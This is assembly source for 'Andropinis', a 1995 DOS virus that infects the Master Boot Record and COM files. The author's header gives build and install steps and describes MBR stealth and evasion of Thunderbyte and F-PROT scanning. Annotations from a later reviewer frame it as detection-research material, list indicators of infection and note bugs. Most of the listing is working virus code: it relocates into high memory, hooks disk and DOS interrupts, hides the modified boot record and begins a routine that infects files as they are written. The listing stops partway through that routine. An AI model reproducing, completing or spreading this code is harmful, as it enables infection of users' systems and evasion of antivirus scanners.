;******************************************************************************
;
; Virus name : Andropinis
; Author : Rajaat
; Origin : United Kingdom, March 1995
; Compiling : Using TASM               | Using A86
;             TASM /M2 ANDROPIN.ASM    | A86 ANDROPIN.ASM
;             TLINK ANDROPIN           |
;             EXE2BIN ANDROPIN         |
; Installing : Place the produced BIN file at cylinder 0, head 0, sector 2
; Modify the partition record to point to this code
; (a debug script is provided at the end of this source)
; Targets : Master Boot Record & COM files
; Size : 512 bytes
; Polymorphic : No
; Encrypted : No
; Stealth : Full Stealth on Master Boot Record
; Tunneling : No - is not needed if started from Master boot record
; Retrovirus : No
; Antiheuristics: Yes - for TBAV
; Peculiarities : Infects MBR by modifying 2 bytes
; Uses SFT's to infect COM files
; Avoids Thunderbyte Antivirus using a 2 byte signature!
; Behaviour : When an infected COM file is run, the virus will not become
; resident, but will first infect the master boot record. It
; does its work in a very peculiar way. It modifies the
; 1st partition record with the result that it points to
; cylinder 0, head 0, sector 2. The viral bootsector will be
; stored there. The next time when a system is booted,
; Andropinis will become resident in high memory, but below
; the top of memory. Programs like CHKDSK.EXE will show a
; decrease in system memory of 1024 bytes. The virus will hook
; interrupt 13 at this time and wait till interrupt 21 is
; captured 3 times. Andropinis will then take interrupt 21
; itself. The virus is now stealth on the master boot record,
; only modifying the pointer to the bootsector in memory when
; the master boot record is read. The virus will infect COM
; files when copied, therefore not needing a critical interrupt
; handler. Andropinis will only infect COM files when they are
; between 4095 and 61441 bytes. Infected files will begin with
; a PUSH AX, DEC BX, NOP and a near jump to the virus code.
; The first 2 instructions will cause the Thunderbyte scanner
; to avoid the file. It thinks it's processed with PkLite!
; Even the "ex"tract option doesn't work and gives back a "N/A"
; for every infected file. F-PROT detects nothing, except when
; the /ANALYSE option is used. AVP gives a virus "Type Boot"
; suspicion. How true that is. The weak point of the virus is
; its lack of protection in infected COM files, so it relies on
; the fact that the Master Boot Record infection isn't visible.
; Tai-Pan also spread far, and was even more simplistic than
; Andropinis, with the exception that it infected the more
; common filetype, the EXE file. The virus doesn't do any
; intended harm, as Patty would say :
; "It's unknown what this virus does besides replicate."
; Yoho's : VLAD, Immortal Riot, Phalcon/Skism, [NuKE],
; and all other virus writers that exist.
;
; Reviewer note : Historical (1995) MBR / COM infector source, kept for analysis
; and detection research only. Indicators visible in this listing:
; the base-memory word at 0040:0013 is decremented by 1 KB and the
; 512-byte sector is copied to the segment just above the reduced
; size; int 13h is hooked at boot and int 21h is re-hooked up to
; 3 times; an int 13h call with AX=5001h is answered with AX=0150h
; (installation check); partition entry 1 of the MBR is pointed at
; CHS 0/0/2 (start head/sector bytes 00 02) where the viral sector
; lives, and reads of the MBR show 01 01 (CHS 0/1/1) instead; COM
; files of 4095..61441 bytes start with PUSH AX / DEC BX / NOP and
; a near JMP. Do not assemble or install outside an isolated lab.
;
;******************************************************************************
.model tiny ; single segment: TLINK + EXE2BIN turn this into a raw 512-byte sector image
.code ; all code, no separate data segment (variables live inside the sector)
.radix 16 ; NOTE: default radix is hexadecimal - every bare numeral below (7c00, 413, 100, 5001, 1bf ...) is hex
org 0 ; image starts at offset 0; the MBR loads it at 0000:7c00 and 'virus' relocates it
;******************************************************************************
; Viral boot sector
;******************************************************************************
virus: xor bx,bx ; BX = 0, reused as the SS/DS segment value and as the copy destination offset
cli ; no interrupts while the stack is switched
mov ss,bx ;
mov ds,bx ; SS = DS = 0000
mov sp,7c00 ; stack grows down from the sector load address
push sp ; save 7c00 as the copy source offset (popped into SI below). NOTE(review): relies on 286+ PUSH SP semantics (pushes the pre-decrement value); an 8086 pushes SP-2
sti ;
mov si,413 ; 0040:0013 = BIOS data area word holding the base memory size in KB (DS = 0)
dec word ptr [si] ; take 1 KB off the top - this is the 1024-byte drop CHKDSK shows, a simple detection indicator
lodsw ; AX = reduced KB count
mov cl,6 ; KB * 64 = paragraph address of the first byte above the reduced
shl ax,cl ; memory size, i.e. the segment the resident copy will occupy
mov es,ax ;
pop si ; SI = 7c00 (pushed above)
mov di,bx ; ES:DI = virus segment:0000 is the copy destination
push di ; push a 0 word - not used here; init_resident pops it into ES and uses it as the CS for the jump to the real boot sector
push es ; far return address for the RETF below:
lea ax,init_resident ; CS = virus segment, IP = init_resident
push ax ;
mov cx,100 ; 100h words = 512 bytes: copy the whole sector from 0000:7c00 to ES:0000
move_boot: movsw ; explicit loop rather than REP MOVSW - the author notes this avoids a TBAV heuristic
loop move_boot ;
retf ; pop IP/CS pushed above -> continue at init_resident in the high copy
;******************************************************************************
; the following piece of code is executed in high memory
;******************************************************************************
init_resident: mov byte ptr cs:hook_21_flag,0 ; hook_21_flag (defined later in the file) counts int 21h re-hooks done by new_13; start at 0
lea di,old_13 ; ES:DI -> old_13 (ES = CS, the virus segment, set by 'virus')
mov si,4*13 ; DS:SI -> IVT entry of int 13h (DS = 0)
lea ax,new_13 ; swap our offset into the vector, keeping the
xchg ax,[si] ; previous offset in AX ...
stosw ; ... and save it in old_13
mov ax,cs ; same for the segment word
xchg ax,[si+2] ;
stosw ; old_13 now holds the previous int 13h vector (used by new_13 to chain)
mov si,4*21 ; DS:SI -> IVT entry of int 21h
lea ax,new_21 ; point it at new_21 immediately. The displaced vector is NOT saved here
xchg ax,[si] ; (presumably meaningless this early in the boot); old_21 is filled in
mov ax,cs ; later by new_13, each time it sees the vector taken away from us
xchg ax,[si+2] ;
pop es ; ES = 0 (the 'push di' word left on the stack by 'virus')
push es ; keep it there as the CS for the RETF below
mov ax,0201 ; AH = 02 read sectors, AL = 1 sector
mov dx,180 ; DH = 1 (head 1), DL = 80 (first hard disk)
mov cx,1 ; CH = 0 (cylinder 0), CL = 1 (sector 1): CHS 0/1/1, the value stealth_mbr shows as the partition start
mov bx,7c00 ; ES:BX = 0000:7c00, the normal boot-sector load address
push bx ; IP for the RETF
int 13h ; load the real boot sector over our original copy. NOTE(review): CF is not checked; a read error still jumps to 7c00
retf ; far jump to 0000:7c00 - boot continues normally with int 13h/21h hooked
;******************************************************************************
; new int 13 handler
;******************************************************************************
new_13: cmp ax,5001 ; installation check: int 13h with AX = 5001h ...
jne no_inst_check ;
xchg ah,al ; ... is answered with AX = 0150h (usable as a resident-infection probe)
iret
no_inst_check: cmp ah,2 ; stealth applies only to AH = 02 (read sectors) ...
jne no_stealth ;
cmp dx,80 ; ... on DL = 80h (first hard disk), DH = 0 ...
jne no_stealth ;
cmp cx,1 ; ... CH = 0, CL = 1, i.e. a read starting at the MBR (CHS 0/0/1)
jne no_stealth ;
pushf ; emulate INT: flags on the stack, then far call the saved handler
call dword ptr cs:[old_13] ;
jnc stealth_mbr ; read succeeded -> patch the buffer
retf 2 ; read failed: return keeping the handler's FLAGS (CF set), dropping the caller's pushed flags
stealth_mbr: cmp word ptr es:1bf[bx],200 ; buffer+1bfh = start head / start sector bytes of partition entry 1 (entry begins at 1beh); 0200h = head 0, sector 2 = the infected pointer to CHS 0/0/2
jne not_infected ; anything else: not our pointer, hand the MBR back unchanged
mov word ptr es:1bf[bx],0101 ; show head 1, sector 1 (CHS 0/1/1) instead; only the in-memory copy is altered, the on-disk MBR keeps the 2 modified bytes
not_infected: iret ; NOTE(review): IRET restores the caller's original FLAGS, so CF = 0 from the successful chained read is not propagated (contrast RETF 2 on the error path)
no_stealth: cmp byte ptr cs:[hook_21_flag],3 ; after three int 21h re-hooks stop watching the vector
je eoi_13 ;
push ax ;
push ds ;
xor ax,ax ; DS = 0 -> IVT
mov ds,ax ;
mov ax,cs ;
cmp ax,word ptr ds:[4*21+2] ; does the int 21h vector segment still point into our segment?
je int_21_ok ; yes: nothing to do
inc byte ptr cs:[hook_21_flag] ; the vector was replaced (by DOS, presumably): count this re-hook ...
lea ax,new_21 ; ... and take int 21h back, this time saving the displaced
xchg ax,ds:[4*21] ; vector in old_21 so new_21 can chain to it
mov word ptr cs:old_21,ax ;
mov ax,cs ;
xchg ax,ds:[4*21+2] ;
mov word ptr cs:old_21[2],ax ;
int_21_ok: pop ds ;
pop ax ;
eoi_13: jmp dword ptr cs:[old_13] ; every other int 13h request goes straight to the previous handler
;******************************************************************************
; new int 21 handler
;******************************************************************************
new_21: cmp ah,40 ; only AH = 40h (DOS write to handle) is intercepted: files are infected as they are written/copied
je write_to_file ; write_to_file follows (continues past this excerpt)
eoi_21: jmp dword ptr cs:[old_21] ; everything else chains to the vector new_13 saved in old_21
write_to_file: push ax ; preserve some registers
push bx ;
push dx ;
push di ;
push es ;
mov ax,4400 ; check if the write belongs
int 21 ; to a device
test dl,80 ;
jnz not_suitable ;
mov ax,1220 ; find file handle table that